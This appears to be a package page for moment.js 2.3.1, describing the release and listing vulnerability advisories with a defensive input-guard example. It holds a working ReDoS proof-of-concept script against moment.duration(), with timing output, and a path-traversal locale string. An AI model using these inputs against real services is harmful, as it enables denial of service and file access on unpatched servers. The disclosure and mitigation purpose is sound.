Moment.js, a widely used JavaScript library for parsing, manipulating, and displaying dates and times, moved from version 2.3.0 to 2.3.1 in October 2013. The two versions share the same core functionality and development dependencies; the differences are the release dates and whatever bug fixes or minor enhancements the newer release carries. Developers familiar with version 2.3.0 will find version 2.3.1 immediately accessible, since the API surface and core features are unchanged.
Both versions offer a comprehensive suite of date manipulation tools: adding or subtracting days, months, or years, formatting dates for display, and calculating time differences. The devDependencies section of package.json shows the tooling used in moment's development: Grunt for task automation, with minification by UglifyJS, code-quality checks by JSHint, and unit tests run with Nodeunit. The repository URL points to the official GitHub repository, where developers can find documentation, contribute to the project, and report issues. This update, though small, ensures developers are on the most up-to-date stable release available at the time and receive any bug fixes and minor improvements made since version 2.3.0. The releaseDate field gives a precise timestamp for each version, useful for tracking software releases and updates.
All the vulnerabilities related to the version 2.3.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
```javascript
var moment = require('moment');

// Builds a string of len+1 copies of chr. Note that the loop counter i is an
// implicit global shared with the outer loop, which is why the printed COUNT
// values advance by 10001 rather than 10000.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Time moment.duration() on ever-longer inputs of the form "-111...1".
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start); // [seconds, nanoseconds] elapsed
  console.log(end);
}
```
```text
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially when a user-provided locale string (e.g. fr) is used directly to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
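As an added defensive example (not code from the advisories or from the moment.js project), the two mitigations above can be enforced before any value reaches the library: a locale name is accepted only if it has a plain tag shape and appears in an allowlist of locales the application actually ships, and a duration string is length-bounded and shape-checked before moment.duration() ever sees it. The function names, the allowlist, the length limits and the regular expressions are assumptions of this example.

```javascript
// Added example: input guards applied before calling into moment.js.
// Names, limits and the locale allowlist are assumptions, not moment APIs.

// Locales this application actually bundles (constructed allowlist).
const SUPPORTED_LOCALES = ['en', 'en-gb', 'fr', 'de', 'pt-br'];

// Only letters, digits and single hyphens: no '/', '\\', '.' or '..' segments,
// so a value like 'dir/../../filename' can never be turned into a file path.
const LOCALE_SHAPE = /^[a-z]{2,3}(?:-[a-z0-9]{1,8})*$/;

// Returns the canonical locale to hand to moment.locale(), or the fallback
// when the request is malformed or not allowlisted. The raw request is never
// passed through.
function resolveLocale(requested, fallback = 'en') {
  if (typeof requested !== 'string') return fallback;
  const candidate = requested.trim().toLowerCase();
  if (candidate.length > 35 || !LOCALE_SHAPE.test(candidate)) return fallback;
  return SUPPORTED_LOCALES.includes(candidate) ? candidate : fallback;
}

// Upper bound for a duration string; legitimate ISO 8601 durations and
// "hh:mm:ss" forms are far shorter. Rejecting oversized input up front keeps
// the backtracking regex inside moment.duration() away from huge strings.
const MAX_DURATION_LEN = 64;
// Both alternatives use bounded quantifiers, so this pre-filter itself
// cannot backtrack catastrophically.
const DURATION_SHAPE =
  /^-?(?:P[0-9A-Z.,:-]{1,40}|[0-9]{1,10}(?::[0-9]{1,2}){0,3}(?:\.[0-9]{1,9})?)$/i;

// Returns true when the value is small and simple enough to pass to
// moment.duration(); callers should reject (not truncate) anything else.
function isAcceptableDurationInput(value) {
  if (typeof value !== 'string') return false;
  if (value.length === 0 || value.length > MAX_DURATION_LEN) return false;
  return DURATION_SHAPE.test(value);
}

// Constructed inputs mirroring the shapes the advisories describe.
function demo() {
  const hostile = '-' + '1'.repeat(20002);
  return {
    traversal: resolveLocale('dir/../../filename'), // 'en'
    fr: resolveLocale(' FR '),                       // 'fr'
    hostile: isAcceptableDurationInput(hostile),     // false
    iso: isAcceptableDurationInput('P1DT2H'),        // true
  };
}
```

Upgrading to the patched releases named above remains the fix; these guards only bound what reaches the library on versions that cannot be upgraded immediately.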